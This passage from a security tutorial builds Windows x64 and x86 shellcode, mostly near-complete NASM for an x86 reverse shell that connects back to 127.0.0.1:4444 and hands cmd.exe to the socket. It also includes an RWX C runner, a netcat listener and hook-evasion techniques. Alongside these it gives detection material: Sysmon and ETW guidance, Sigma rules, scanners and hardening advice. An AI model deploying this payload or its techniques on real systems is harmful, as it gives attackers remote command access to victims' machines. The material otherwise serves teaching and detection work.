asm = b"""
    xor eax, eax
    mov eax, 0x76ab1234
    mov rbx, qword ptr gs:[0x60]
    mov rbx, qword ptr [rbx + 0x18]
"""
ks = Ks(KS_ARCH_X86, KS_MODE_64)
code, _ = ks.asm(asm)
buf = bytes(code)
print(buf.hex())
bad = [i for i, b in enumerate(buf) if b == 0x00]
print(f"length={len(buf)} bad_byte_offsets={bad}")

Run it, see exactly where nulls (or any other bad character) land, and rewrite the offending instruction.


9. Shellcode Skeleton: Putting It Together

The pieces combine into a recognisable x64 stub: align the stack, walk the PEB to find kernel32.dll, parse the EAT to resolve GetProcAddress and LoadLibraryA, and then call out through the standard ABI with proper shadow space.

[BITS 64]
_start:
    ; --- entry: defensively align stack ---
    and   rsp, 0xFFFFFFFFFFFFFFF0
    sub   rsp, 0x20                ; shadow space (RSP is already 16-byte aligned)

    ; --- locate kernel32.dll via PEB ---
    mov   rbx, [gs:0x60]           ; TEB -> PEB
    mov   rbx, [rbx + 0x18]        ; PEB -> Ldr
    mov   rbx, [rbx + 0x20]        ; InMemoryOrderModuleList.Flink (1st entry: executable)
    mov   rbx, [rbx]               ; -> ntdll entry
    mov   rbx, [rbx]               ; -> kernel32 entry
    mov   r15, [rbx + 0x20]        ; r15 = kernel32 base (DllBase relative to InMemoryOrderLinks)

    ; --- resolve GetProcAddress via ROR-13 hash (call into eat_lookup) ---
    mov   rcx, r15
    mov   edx, 0x7C0DFCAA          ; ROR-13("GetProcAddress")  (illustrative)
    call  eat_lookup               ; rax = &GetProcAddress
    mov   r14, rax

    ; --- call LoadLibraryA("user32.dll") via GetProcAddress ---
    mov   rcx, r15                 ; hModule = kernel32
    lea   rdx, [rel s_LoadLibraryA]
    call  r14                      ; rax = &LoadLibraryA
    lea   rcx, [rel s_user32]
    call  rax                      ; rax = HMODULE user32

    ; --- ... continue resolution and API calls ...

    add   rsp, 0x20
    ret                            ; only valid if RSP was already 16-byte aligned on entry;
                                   ; otherwise the original RSP must be saved before the and

s_LoadLibraryA: db "LoadLibraryA", 0
s_user32:       db "user32.dll", 0

; eat_lookup: in rcx=module base, edx=ROR13 hash -> rax = export addr
eat_lookup:
    ; (see §7 for the inner loop; that listing takes the base in rax and the
    ;  hash in ebp, so move the arguments across before reusing it)
    ret

Every block in the skeleton corresponds to one of the rules established above: sub rsp, 0x20 for shadow space once RSP has been force-aligned, gs:[0x60] for the PEB, [rbx + 0x20] for DllBase relative to InMemoryOrderLinks, lea + RIP-relative strings for PIC, and r14 / r15 holding state across calls because callees must preserve non-volatile registers.


10. Common Attacker Techniques

Technique                                 Description
PEB-walk API resolution                   Locate kernel32.dll via gs:[0x60] chain, parse exports by hash
ROR-13 export hashing                     Avoid embedded API name strings; survive static signature scans
RIP-relative PIC                          lea reg, [rel label] to address embedded data without fixups
Sub-register zero-extension               mov eax, imm32 to write RAX with no null bytes
Shadow-space-aware call wrapping          sub rsp, 0x28 around every Win32 call from an unknown caller
Direct Win32 → Native API substitution    Call Nt* syscalls to bypass usermode hooks (T1106)
Reflective loading of a PE in memory      Shellcode bootstraps a full PE image without touching disk (T1620)

11. Defensive Strategies & Detection

Shellcode is observable at multiple layers. The most reliable signals come from the behaviours the techniques above require, not from the byte patterns they happen to produce.

Sysmon events to enable and triage:

  • EventID 1 (Process Create). Unusual parent/child chains (browser, Office, mail client spawning cmd.exe / powershell.exe) are the cheapest, highest-yield signal.
  • EventID 8 (CreateRemoteThread). Cross-process thread creation into LSASS, browsers, or signed Windows binaries is high-fidelity.
  • EventID 10 (ProcessAccess). Watch GrantedAccess masks like 0x1FFFFF (full access) and 0x1010 (PROCESS_QUERY_LIMITED_INFORMATION + PROCESS_VM_READ, a memory-read mask with no write rights).
  • EventID 17 / 18 (pipe creation/connection). Named pipes are frequently used by shellcode-launched implants for C2.

ETW providers worth subscribing to in EDR pipelines:

  • Microsoft-Windows-Kernel-Process: kernel-side process/thread/image events.
  • Microsoft-Windows-Threat-Intelligence (PPL-only consumers): NtAllocateVirtualMemory, NtProtectVirtualMemory, NtWriteVirtualMemory, NtCreateThreadEx observed at the syscall layer. The events are emitted by the kernel, so patching out user-mode hooks does not suppress them.
  • Microsoft-Windows-Security-Auditing: handle and object access.

Audit policies: Audit Process Creation (Success) and Audit Kernel Object surface the same events to the classic Security log for SIEM ingestion.

Behavioural signals defenders should hunt on:

  • Threads with StartAddress in MEM_PRIVATE regions that are PAGE_EXECUTE_* and not backed by a file image.
  • CallTrace containing UNKNOWN frames — the calling instruction lives in unbacked memory.
  • gs:[0x60] opcode pattern (65 48 8B 04 25 60 00 00 00) inside executable regions of non-system modules.
  • ROR-13 hashing loops in memory scans.
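As an illustration of the third signal, the sketch below scans a byte buffer (for example a dumped private executable region) for 64-bit loads from gs:[0x60]. It is deliberately simple: the regular expression covers only the mov r64, gs:[0x60] absolute-address encoding with any destination register, and the function name is hypothetical. A hit is a lead for triage, not proof, because legitimate code reads the PEB too.

```python
import re

# 65       GS segment override
# 48 / 4C  REX.W (4C also sets REX.R, selecting r8-r15 as destination)
# 8B       mov r64, r/m64
# ModRM    mod=00, rm=100 (SIB follows), reg = destination (8 possible values)
# 25       SIB: no base, no index, disp32 follows
# 60 00 00 00  disp32 = 0x60 (PEB pointer inside the TEB)
GS60_LOAD = re.compile(
    rb"\x65[\x48\x4c]\x8b[\x04\x0c\x14\x1c\x24\x2c\x34\x3c]\x25\x60\x00\x00\x00",
    re.DOTALL,
)


def find_peb_loads(buf: bytes) -> list:
    """Return the offsets of every gs:[0x60] load found in buf."""
    return [m.start() for m in GS60_LOAD.finditer(buf)]


if __name__ == "__main__":
    sample = (b"\x90\x90"
              + bytes.fromhex("65488B042560000000")   # mov rax, gs:[0x60]
              + b"\xc3"
              + bytes.fromhex("654C8B1C2560000000"))  # mov r11, gs:[0x60]
    print(find_peb_loads(sample))  # [2, 12]
```

In practice the scan would be restricted to MEM_PRIVATE executable regions, which is what keeps the false-positive rate manageable.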

Sigma sketch — suspicious cross-process access typical of shellcode injection:

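title: Suspicious Cross-Process Access With Full-Access or Memory-Read Rights
logsource:
  product: windows
  service: sysmon
detection:
  selection:
    EventID: 10
    GrantedAccess:
      - '0x1FFFFF'   # PROCESS_ALL_ACCESS (includes VM write and thread creation)
      - '0x1410'     # QUERY_LIMITED_INFORMATION | QUERY_INFORMATION | VM_READ
      - '0x1010'     # QUERY_LIMITED_INFORMATION | VM_READ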
  filter_legit:
    SourceImage|endswith:
      - '\MsMpEng.exe'
      - '\WmiPrvSE.exe'
  condition: selection and not filter_legit
level: high
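When tuning a rule like this, it helps to see which rights a GrantedAccess value actually contains. The sketch below decodes the process-specific bits using the constants from the Windows SDK headers; the function names are illustrative, and standard or generic rights outside the table are simply ignored.

```python
PROCESS_ACCESS_BITS = {
    0x0001: "PROCESS_TERMINATE",
    0x0002: "PROCESS_CREATE_THREAD",
    0x0004: "PROCESS_SET_SESSIONID",
    0x0008: "PROCESS_VM_OPERATION",
    0x0010: "PROCESS_VM_READ",
    0x0020: "PROCESS_VM_WRITE",
    0x0040: "PROCESS_DUP_HANDLE",
    0x0080: "PROCESS_CREATE_PROCESS",
    0x0100: "PROCESS_SET_QUOTA",
    0x0200: "PROCESS_SET_INFORMATION",
    0x0400: "PROCESS_QUERY_INFORMATION",
    0x0800: "PROCESS_SUSPEND_RESUME",
    0x1000: "PROCESS_QUERY_LIMITED_INFORMATION",
}


def decode_granted_access(mask) -> list:
    """Return the names of the process access rights set in mask.

    Accepts an int or a hex string as logged by Sysmon (e.g. '0x1010').
    """
    if isinstance(mask, str):
        mask = int(mask, 16)
    return [name for bit, name in sorted(PROCESS_ACCESS_BITS.items()) if mask & bit]


def allows_memory_write(mask) -> bool:
    """True when the mask grants both PROCESS_VM_OPERATION and PROCESS_VM_WRITE."""
    rights = decode_granted_access(mask)
    return "PROCESS_VM_WRITE" in rights and "PROCESS_VM_OPERATION" in rights


if __name__ == "__main__":
    print(decode_granted_access("0x1010"))
    # ['PROCESS_VM_READ', 'PROCESS_QUERY_LIMITED_INFORMATION']
    print(allows_memory_write(0x1010), allows_memory_write(0x1FFFFF))  # False True
```

Separating read-only masks (typical of memory scraping) from write-capable ones (needed for injection) lets the two behaviours be routed to different detections.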

Hardening to deploy on monitored endpoints:

  • Arbitrary Code Guard (ACG) — denies the PAGE_EXECUTE_* transition that turns a MEM_PRIVATE shellcode buffer into runnable code.
  • Control Flow Guard (CFG) — invalidates indirect calls into unregistered targets, which shellcode entry points always are.
  • Block Win32 API calls from Office macros / child processes — Attack Surface Reduction rule that severs the most common shellcode delivery vector.
  • PPL-protected EDR with kernel ETW Ti subscription — preserves syscall-layer telemetry even when userland hooks are patched out.

A useful EDR tripwire is to permute the head of InMemoryOrderModuleList with stub entries: shellcode that walks two Flinks blindly resolves the decoy module, fails to find expected exports, and crashes — producing a high-fidelity detection.


12. Tools for x64 Shellcode Analysis

Tool                        Description                                                                             Link
NASM                        Assembler for the snippets in this tutorial; emits raw binary for direct hex inspection   nasm.us
Keystone Engine             Programmatic assembler (Python bindings) for bad-character analysis labs                keystone-engine.org
x64dbg                      User-mode debugger; trace shellcode through gs:[0x60] and EAT walks                     x64dbg.com
WinDbg                      Inspect _TEB, _PEB, _PEB_LDR_DATA, _LDR_DATA_TABLE_ENTRY on the target build            learn.microsoft.com
Ghidra / IDA                Static analysis of shellcode-bearing samples and reflective loader stubs                ghidra-sre.org
Volatility 3                Memory forensics: enumerate suspicious MEM_PRIVATE + RX regions, hunt unbacked threads  volatilityfoundation.org
Process Hacker              Live triage of thread start addresses and memory protections                            processhacker.sourceforge.io
Godbolt Compiler Explorer   Inspect MSVC-emitted x64 prologues to confirm ABI assumptions                           godbolt.org

13. MITRE ATT&CK Mapping

Technique                         MITRE ID     Detection
Process Injection (umbrella)      T1055        Sysmon EventID 8 + EventID 10 with VM-write GrantedAccess
DLL Injection                     T1055.001    Image Load (EventID 7) from MEM_PRIVATE-allocated path
Portable Executable Injection     T1055.002    Volatility scans for PE headers in MEM_PRIVATE RX regions
APC Injection                     T1055.004    ETW Ti NtQueueApcThread to remote thread; alerted thread-start addresses
Process Hollowing                 T1055.012    EventID 1 with suspended child, followed by EventID 10 write + resume
Native API                        T1106        ETW Ti syscall provider; direct Nt* calls outside ntdll
Obfuscated Files or Information   T1027        YARA on ROR-13 loops; entropy heuristics on dropped payloads
Reflective Code Loading           T1620        Unbacked RX memory with PE magic / no module image record

Summary

  • x64 Windows shellcode is governed by a strict ABI: argument registers RCX/RDX/R8/R9, return in RAX, a 32-byte shadow space, and 16-byte stack alignment at every call.
  • The PEB is reached via gs:[0x60] on x64 (the GS segment base is the TEB); the loader offsets used from there (+0x18, +0x20, and +0x20 again from InMemoryOrderLinks to DllBase) differ from the x86 layout and must be verified against the target build.
  • Position-independent API resolution combines a PEB walk to kernel32.dll with an EAT walk using ROR-13 name hashing to avoid embedded strings.
  • Null-byte avoidance leans on 32-bit sub-register writes that zero-extend, RIP-relative lea, and XOR-then-push idioms.
  • Detection is layered: Sysmon EventID 8/10 for injection chains, ETW Threat-Intelligence for syscall-level memory writes, behavioural hunts for unbacked RX regions, and ACG/CFG/ASR hardening to deny the primitives shellcode depends on.

Writing Your First Shellcode: x86 Reverse Shell from Scratch

Objective: Understand how a Windows x86 reverse shell payload is hand-built in NASM assembly — walking the PEB to locate kernel32.dll, parsing the PE export table to resolve GetProcAddress without imports, initialising Winsock, and spawning cmd.exe over a socket — and learn the telemetry each stage emits so you can detect and defend against it.


1. What Is Shellcode? Constraints and Goals

Shellcode is a self-contained blob of machine code that runs after a control-flow hijack (or injection) with no loader, no imports, and no fixed base address. It is the raw payload that tools like msfvenom emit; understanding it byte-by-byte is what lets a defender recognise it in memory.

A Windows x86 reverse shell differs from a Linux equivalent in one fundamental way: Linux exposes a stable syscall/int 0x80 interface, while Windows forces you to call documented Win32 APIs — and you cannot import them, because injected code has no import table. You must therefore find the APIs yourself at runtime.

Constraint             Description
Position independent   Runs at an unknown address; all references are stack-relative or computed
Null-free              \x00 terminates strings in many injection vectors and truncates the payload
No imports             API addresses must be resolved from loaded modules at runtime
Bad-char aware         \x00, \x0a, \x0d and vector-specific bytes must be avoided by design

Lab setup: a Windows 10 x86 VM, NASM for assembly, WinDbg for stepping the PEB walk, a small C runner to execute the blob, and a Python scanner to audit bad characters. Build and test only in an isolated VM.


2. x86 Calling Conventions and Stack Mechanics

Win32 APIs use stdcall: arguments are pushed right-to-left, and the callee cleans the stack with ret N. This matters because after an API call returns, whether it succeeded or not, you do not adjust esp yourself; the function already did. cdecl (caller cleans) appears only in CRT helpers you will not touch here.

Convention   Stack Cleanup    Argument Order   Used By
stdcall      Callee (ret N)   Right-to-left    Win32 APIs (CreateProcessA, WSASocketA)
cdecl        Caller           Right-to-left    CRT functions

eax, ecx, and edx are volatile (caller-saved); ebx, esi, edi, and ebp survive a call. Shellcode exploits this: stash the kernel32 base in ebx and a resolver pointer in ebp, and they persist across every API call. Strings and structures are constructed by pushing dwords onto the stack in reverse, then referencing them directly through esp.


3. The PEB Walk: Finding kernel32.dll Without Imports

Every thread can reach its Process Environment Block (PEB) through the pointer stored in its TEB at FS:[0x30]. The PEB holds Ldr (a pointer to PEB_LDR_DATA) at +0x0C, whose InMemoryOrderModuleList at +0x14 is a doubly-linked list of loaded modules. In 32-bit processes on Windows 7 and later the list conventionally starts with [0] the executable → [1] ntdll.dll → [2] kernel32.dll, although that order is observed loader behaviour rather than a documented guarantee. Two FLink dereferences from the first entry land on kernel32’s entry, and DllBase sits 0x10 bytes past the InMemoryOrderLinks field.

bits 32
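    xor    eax, eax
    mov    eax, [fs:eax+0x30]  ; TEB->ProcessEnvironmentBlock (PEB); the register-relative form
                               ; avoids the null bytes that the absolute [fs:0x30] encoding carries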
    mov    eax, [eax+0x0c]     ; PEB->Ldr (PEB_LDR_DATA)
    mov    eax, [eax+0x14]     ; Ldr->InMemoryOrderModuleList (1st: executable)
    mov    eax, [eax]          ; FLink -> ntdll.dll entry
    mov    eax, [eax]          ; FLink -> kernel32.dll entry
    mov    ebx, [eax+0x10]     ; LDR entry->DllBase (kernel32 base) -> ebx

Verify the chain live in WinDbg before trusting any offset on your target build:

0:000> dt nt!_TEB @$teb ProcessEnvironmentBlock
0:000> dt nt!_PEB @$peb Ldr
0:000> dt nt!_PEB_LDR_DATA poi(@$peb+0xc) InMemoryOrderModuleList
0:000> dl poi(poi(@$peb+0xc)+0x14) 4

[Figure: flowchart showing the PEB walk chain from the TEB at FS:[0x30] through PEB, PEB_LDR_DATA, and InMemoryOrderModuleList to the kernel32.dll base address.]
Two FLink dereferences from the module list head land on kernel32.dll’s LDR entry; DllBase sits 0x10 bytes past the InMemoryOrderLinks field.

4. Export Table Parsing: Resolving GetProcAddress

The bootstrap problem: shellcode cannot call GetProcAddress until it has found GetProcAddress. The fix is to parse the kernel32 PE export table manually. From the base, e_lfanew at +0x3C reaches the NT headers; the export-directory RVA lives at NT +0x78; the directory exposes three parallel arrays — AddressOfNames (+0x20), AddressOfNameOrdinals (+0x24), and AddressOfFunctions (+0x1C).

; ebx = kernel32 base
    mov    eax, [ebx+0x3c]     ; e_lfanew
    mov    eax, [ebx+eax+0x78] ; export table RVA
    lea    edi, [ebx+eax]      ; edi -> IMAGE_EXPORT_DIRECTORY
    mov    ecx, [edi+0x20]     ; AddressOfNames RVA
    lea    ecx, [ebx+ecx]      ; -> name-pointer array
    xor    edx, edx            ; name index = 0
.next:
    mov    esi, [ecx+edx*4]    ; RVA of candidate name
    lea    esi, [ebx+esi]      ; -> ASCII name string
    ; compare esi against "GetProcAddress" (string or 4-byte hash) ...
    inc    edx
    jmp    .next
.match:
    mov    eax, [edi+0x24]     ; AddressOfNameOrdinals RVA
    movzx  eax, word [ebx+eax+edx*2]   ; ordinal index for this name
    mov    ecx, [edi+0x1c]     ; AddressOfFunctions RVA
    mov    eax, [ebx+ecx+eax*4]; function RVA
    lea    eax, [ebx+eax]      ; eax = VA of GetProcAddress

Production shellcode usually replaces the literal strcmp with a rolling 4-byte hash of each export name — it is smaller and naturally null-free.


[Figure: diagram of the PE export table structure, showing how shellcode traverses from the kernel32 base address through the NT headers to the export directory and its three parallel arrays to resolve GetProcAddress.]
Shellcode walks three parallel export arrays — names, ordinals, and functions — to translate a name hash into the final virtual address of GetProcAddress.

5. Bootstrapping Further API Resolution

Once GetProcAddress is resolved, save it (e.g. in ebp) and use it to resolve everything else. The first follow-up is LoadLibraryA, which lets you bring in ws2_32.dll and resolve the Winsock functions the reverse shell needs.

; ebp = resolved GetProcAddress, ebx = kernel32 base
    xor    eax, eax
    push   eax                 ; null terminator ("LoadLibraryA" is exactly 12 bytes)
    push   0x41797261          ; "aryA"
    push   0x7262694c          ; "Libr"
    push   0x64616f4c          ; "Load"
    mov    esi, esp            ; esi -> "LoadLibraryA"
    push   esi
    push   ebx                 ; hModule = kernel32
    call   ebp                 ; GetProcAddress -> LoadLibraryA in eax
    ; eax now holds LoadLibraryA; call it on "ws2_32.dll", then resolve
    ; WSAStartup, WSASocketA, WSAConnect, CreateProcessA, ExitProcess.

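Every API name is pushed as little-endian dwords, last chunk first, so it reads correctly in memory; a name whose length is a multiple of four needs a zeroed register pushed first as its terminator. Wrap the resolve-and-call logic in a small subroutine that takes a module base and a name pointer; the reverse shell calls it once for each API it resolves.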
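When reading a sample, the same convention has to be undone: a run of push imm32 values is turned back into the string it stages. The sketch below does that for the constants shown above; decode_stack_string is a hypothetical helper name.

```python
import struct


def decode_stack_string(pushed_dwords) -> str:
    """Recover the ASCII string staged by a sequence of `push imm32`.

    pushed_dwords is given in push order (first pushed first). The last
    push ends up at the lowest address, so memory order is the reverse
    of push order; each dword is stored little-endian.
    """
    raw = b"".join(struct.pack("<I", d) for d in reversed(pushed_dwords))
    return raw.split(b"\x00", 1)[0].decode("ascii")


if __name__ == "__main__":
    print(decode_stack_string([0x41797261, 0x7262694C, 0x64616F4C]))  # LoadLibraryA
    # A leading zero dword acts as the terminator, as in the " cmd.exe" string:
    print(repr(decode_stack_string([0x00000000, 0x6578652E, 0x646D6320])))  # ' cmd.exe'
```

Runs of printable push immediates followed by mov reg, esp are also a practical static signature for stack-built strings.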


6. Winsock Initialisation and Socket Creation

WSAStartup(0x0202, &wsaData) must run before any socket API. Reserve the 400-byte WSADATA on the stack and pass a pointer; the OS fills it. Then WSASocketA(2, 1, 6, NULL, 0, 0) creates a TCP socket (AF_INET, SOCK_STREAM, IPPROTO_TCP).

    sub    esp, 0x190          ; reserve WSADATA (400 bytes)
    push   esp                 ; lpWSAData
    push   0x0202              ; wVersionRequired = 2.2
    call   <WSAStartup>

    xor    eax, eax
    push   eax                 ; dwFlags
    push   eax                 ; g
    push   eax                 ; lpProtocolInfo = NULL
    push   6                   ; IPPROTO_TCP
    push   1                   ; SOCK_STREAM
    push   2                   ; AF_INET
    call   <WSASocketA>        ; eax = socket handle
    mov    edi, eax            ; save socket in edi

Build the 16-byte SOCKADDR_IN inline and connect. The IP and port are stored in network byte order (big-endian), while sin_family stays little-endian; 127.0.0.1:4444 becomes 0x0100007f and the packed family/port dword 0x5c110002.

    xor    eax, eax
    push   eax                 ; sin_zero[4..8]
    push   eax                 ; sin_zero[0..4]
    push   0x0100007f          ; sin_addr  = 127.0.0.1
    push   0x5c110002          ; sin_port 4444 | sin_family AF_INET
    mov    esi, esp            ; esi -> SOCKADDR_IN

    push   eax                 ; lpGQOS       = NULL
    push   eax                 ; lpSQOS       = NULL
    push   eax                 ; lpCalleeData = NULL
    push   eax                 ; lpCallerData = NULL
    push   0x10                ; namelen
    push   esi                 ; name -> SOCKADDR_IN
    push   edi                 ; socket
    call   <WSAConnect>
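The two pushed constants are exactly what an analyst extracts from a captured blob to recover the callback address. The sketch below reverses the packing described above; the function name is illustrative, and it assumes the dwords are given as they appear in the push immediates.

```python
import socket
import struct


def decode_sockaddr_in(family_port_dword: int, addr_dword: int):
    """Turn the two pushed dwords back into (family, port, ip)."""
    # Re-create the bytes as they sit in memory (x86 stores dwords little-endian).
    raw = struct.pack("<II", family_port_dword, addr_dword)
    (family,) = struct.unpack("<H", raw[0:2])   # sin_family: host (little-endian) order
    (port,) = struct.unpack(">H", raw[2:4])     # sin_port: network (big-endian) order
    ip = socket.inet_ntoa(raw[4:8])             # sin_addr: network order
    return family, port, ip


if __name__ == "__main__":
    print(decode_sockaddr_in(0x5C110002, 0x0100007F))  # (2, 4444, '127.0.0.1')
```

Applied to memory dumps or proxy-captured payloads, this yields the connect-back endpoint without executing anything.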

7. Spawning cmd.exe Over the Socket

The final stage is the most error-prone: a fully populated 68-byte STARTUPINFOA with cb = 0x44, dwFlags = STARTF_USESTDHANDLES (0x100), and all three standard handles pointed at the connected socket. CreateProcessA(NULL, " cmd.exe", ...) then launches the shell with stdin/stdout/stderr riding the TCP stream.

    xor    eax, eax
    push   edi                 ; hStdError  = socket   (+0x40)
    push   edi                 ; hStdOutput = socket   (+0x3C)
    push   edi                 ; hStdInput  = socket   (+0x38)
    times 2 push eax           ; lpReserved2, wShowWindow/cbReserved2 (+0x34, +0x30)
    push   0x00000100          ; dwFlags = STARTF_USESTDHANDLES (+0x2C)
    times 10 push eax          ; dwFillAttribute down to lpReserved (+0x28 .. +0x04)
    push   0x44                ; cb = sizeof(STARTUPINFOA) (+0x00)
    mov    ebx, esp            ; ebx -> STARTUPINFOA

    sub    esp, 0x10
    mov    esi, esp            ; esi -> PROCESS_INFORMATION

    push   eax                 ; "....\0" terminator (runtime-supplied null)
    push   0x6578652e          ; ".exe"
    push   0x646d6320          ; " cmd"  (0x20 = space, null-free)
    mov    edx, esp            ; edx -> " cmd.exe"

    push   esi                 ; lpProcessInformation
    push   ebx                 ; lpStartupInfo
    push   eax                 ; lpCurrentDirectory
    push   eax                 ; lpEnvironment
    push   eax                 ; dwCreationFlags
    inc    eax
    push   eax                 ; bInheritHandles = TRUE
    dec    eax
    push   eax                 ; lpThreadAttributes
    push   eax                 ; lpProcessAttributes
    push   edx                 ; lpCommandLine = " cmd.exe"
    push   eax                 ; lpApplicationName = NULL
    call   <CreateProcessA>

    push   eax                 ; uExitCode
    call   <ExitProcess>
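Because the structure is built by counting pushes, an off-by-one silently moves dwFlags or the handles to the wrong offset. A quick way to sanity-check the counts is to model the 32-bit STARTUPINFOA layout and read the offsets back. This is a sketch: the class name STARTUPINFOA32 and the helper are chosen here, and pointers and handles are modelled as 4-byte integers so the result does not depend on the machine running the check.

```python
import ctypes
from ctypes import c_uint16, c_uint32


class STARTUPINFOA32(ctypes.Structure):
    _fields_ = [
        ("cb", c_uint32), ("lpReserved", c_uint32), ("lpDesktop", c_uint32),
        ("lpTitle", c_uint32), ("dwX", c_uint32), ("dwY", c_uint32),
        ("dwXSize", c_uint32), ("dwYSize", c_uint32),
        ("dwXCountChars", c_uint32), ("dwYCountChars", c_uint32),
        ("dwFillAttribute", c_uint32), ("dwFlags", c_uint32),
        ("wShowWindow", c_uint16), ("cbReserved2", c_uint16),
        ("lpReserved2", c_uint32), ("hStdInput", c_uint32),
        ("hStdOutput", c_uint32), ("hStdError", c_uint32),
    ]


def dwords_between(lower_field: str, upper_field: str) -> int:
    """Number of whole dwords strictly between two fields of STARTUPINFOA32."""
    lo = getattr(STARTUPINFOA32, lower_field).offset
    hi = getattr(STARTUPINFOA32, upper_field).offset
    return (hi - lo) // 4 - 1


if __name__ == "__main__":
    print(hex(ctypes.sizeof(STARTUPINFOA32)))      # 0x44
    print(hex(STARTUPINFOA32.dwFlags.offset))      # 0x2c
    print(dwords_between("cb", "dwFlags"))         # 10 zero dwords below dwFlags
    print(dwords_between("dwFlags", "hStdInput"))  # 2 zero dwords above dwFlags
```

The same offsets are what a memory-forensics script would use to pull the three standard handles out of a suspicious process's startup block.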

[Figure: sequential flowchart of the full reverse shell execution chain from PEB walk through export parsing, Winsock initialisation, TCP connect, STARTUPINFOA setup, and the final CreateProcessA call spawning cmd.exe.]
Every stage builds on the last: the PEB walk feeds export parsing, which unlocks Winsock, which provides the socket handle wired into cmd.exe’s standard I/O.

8. Null-Byte Elimination and Bad-Character Audit

A single \x00 mid-payload can truncate your shellcode. Design it out from the start.

Bad Byte            Naive Source                  Null-Free Replacement
\x00                mov ecx, 0                    xor ecx, ecx
\x00 in string      push 0x00657865 ("exe\0")     terminator from push eax after xor eax, eax
\x00 in mov al,0    mov al, 0                     xor eax, eax then use al
\x0a / \x0d         constant containing CR/LF     re-encode IP/port or split the immediate

The runtime-supplied terminator trick (xor eax, eax followed by push eax) keeps the " cmd.exe" string null-free, and CreateProcessA’s command-line parser tolerates the leading space that the padded " cmd" dword introduces. Audit the assembled binary with a scanner:

import sys
BAD = {0x00, 0x0a, 0x0d}                # extend per injection vector

with open(sys.argv[1], "rb") as f:
    sc = f.read()
for i, b in enumerate(sc):
    if b in BAD:
        print(f"[!] bad char 0x{b:02x} at offset {i}")
print(f"[*] {len(sc)} bytes scanned")

9. Testing and Verification

Assemble to a flat binary, then execute it in a controlled runner that mirrors how an exploit lands code in memory — VirtualAlloc with PAGE_EXECUTE_READWRITE, copy, and call through a function pointer.

nasm -f bin reverse.asm -o reverse.bin
python3 badchars.py reverse.bin

#include <windows.h>
#include <string.h>
unsigned char sc[] = { /* contents of reverse.bin */ };

int main(void) {
    void *mem = VirtualAlloc(NULL, sizeof(sc),
                             MEM_COMMIT | MEM_RESERVE,
                             PAGE_EXECUTE_READWRITE);   // RWX: loud, lab-only
    if (mem == NULL) return 1;                          // allocation failed
    memcpy(mem, sc, sizeof(sc));
    ((void(*)(void))mem)();
    return 0;
}

Catch the callback with nc -lvnp 4444. Note the RWX allocation — real-world loaders allocate RW, copy, then flip to RX with VirtualProtect precisely because PAGE_EXECUTE_READWRITE is a classic detection signal.


10. Common Attacker Techniques

Technique               Description
PEB walk                Locate kernel32.dll base with no imports via FS:[0x30]
Export hashing          Resolve APIs by name hash to stay small and null-free
Stack string building   Push reversed dwords to stage " cmd.exe", ws2_32.dll, API names
STDIO redirection       Point hStdInput/Output/Error at the socket for an interactive shell
Process injection       Deliver the blob via VirtualAllocEx + WriteProcessMemory + CreateRemoteThread
RW → RX staging         Allocate RW, copy, VirtualProtect to RX to evade RWX heuristics

11. Defensive Strategies and Detection

Each shellcode stage emits telemetry. Map detections to the chain, not to a single indicator.

Sysmon Event ID   Name                 What It Catches
1                 Process Create       cmd.exe with an unexpected ParentImage / ParentCommandLine
3                 Network Connection   Outbound TCP from cmd.exe or a non-browser binary (C2 connect-back)
8                 CreateRemoteThread   Cross-process thread where SourceImage ≠ TargetImage
10                ProcessAccess        GrantedAccess to injected memory; CallTrace containing UNKNOWN
11                FileCreate           Shellcode or loader dropped to disk

Windows Security auditing adds Event 4688 (process creation with command line, when ProcessCreationIncludeCmdLine_Enabled = 1), 5156 (WFP outbound TCP allowed — the reverse connect at the network layer), and 4689 (process exit, for shell-lifetime correlation). The kernel Microsoft-Windows-Threat-Intelligence ETW provider emits KERNEL_THREATINT_TASK_ALLOCVM/PROTECTVM on RWX activity but requires a signed ELAM/PPL consumer.

The canonical community Sigma rule for shellcode injection keys on ProcessAccess:

title: Shellcode Process Injection via Suspicious ProcessAccess
logsource:
  category: process_access
  product: windows
detection:
  selection:
    GrantedAccess:
      - '0x147a'
      - '0x1f3fff'
    CallTrace|contains: 'UNKNOWN'
  condition: selection
tags:
  - attack.defense_evasion
  - attack.privilege_escalation
  - attack.t1055
level: high

Hardening: enable command-line auditing, deploy a tuned Sysmon baseline (SwiftOnSecurity / Olaf Hartong) for EIDs 1/3/8/10, enforce default-deny egress on workstations (reverse shells need outbound TCP), apply ASR rules such as D4F940AB-401B-4EFC-AADC-AD5F3C50688A (block Office applications from creating child processes) and d3e037e1-3eb8-44c8-a917-57927947596d (block JavaScript or VBScript from launching downloaded executable content), and alert on VirtualAlloc(RWX). AMSI does not see raw shellcode but catches PowerShell/VBScript loaders.


[Figure: hierarchy diagram mapping each shellcode execution stage to its corresponding detection telemetry source, including Windows Event IDs, Sysmon event IDs, ETW providers, ASR rules, and egress firewall controls.]
Effective defence maps detections to each stage of the kill chain rather than relying on a single indicator — RWX allocation, outbound TCP, and process creation each emit distinct, correlatable telemetry.

12. Tools for Shellcode Analysis

Tool         Description                                                 Link
NASM         Assemble x86 to flat binary                                 nasm.us
WinDbg       Step the PEB walk and export parse live                     microsoft.com
x64dbg       Dynamic analysis of the loader and payload                  x64dbg.com
Ghidra       Static disassembly of extracted shellcode                   ghidra-sre.org
Radare2      Lightweight disassembly and patching                        radare.org
Sysmon       Generate EID 1/3/8/10 detection telemetry                   microsoft.com
Volatility   Memory forensics: recover RWX regions and injected code     volatilityfoundation.org

13. MITRE ATT&CK Mapping

Technique                                                   MITRE ID     Detection
Command and Scripting Interpreter: Windows Command Shell    T1059.003    Sysmon EID 1 / 4688 cmd.exe spawn chain
Process Injection                                           T1055        Sysmon EID 10 GrantedAccess + CallTrace UNKNOWN
Process Injection: DLL Injection                            T1055.001    Sysmon EID 7/8 on reflective-DLL delivery
Obfuscated Files or Information                             T1027        Null-free/encoded IP/port constants in the blob
Non-Application Layer Protocol                              T1095        Sysmon EID 3 / 5156 raw TCP from non-browser process
Application Layer Protocol: Web Protocols                   T1071.001    Proxy/TLS inspection (contrast C2 transport)
System Information Discovery                                T1082        PEB walk as in-memory module discovery
Native API                                                  T1106        Direct WSASocketA / CreateProcessA calls without framework APIs

Summary

  • A Windows x86 reverse shell is just position-independent code that resolves its own APIs, opens a TCP socket, and redirects cmd.exe over it.
  • The PEB walk (FS:[0x30] → Ldr → InMemoryOrderModuleList, third entry) locates kernel32.dll with no imports.
  • Parsing the PE export table resolves GetProcAddress, which bootstraps LoadLibraryA and every Winsock function.
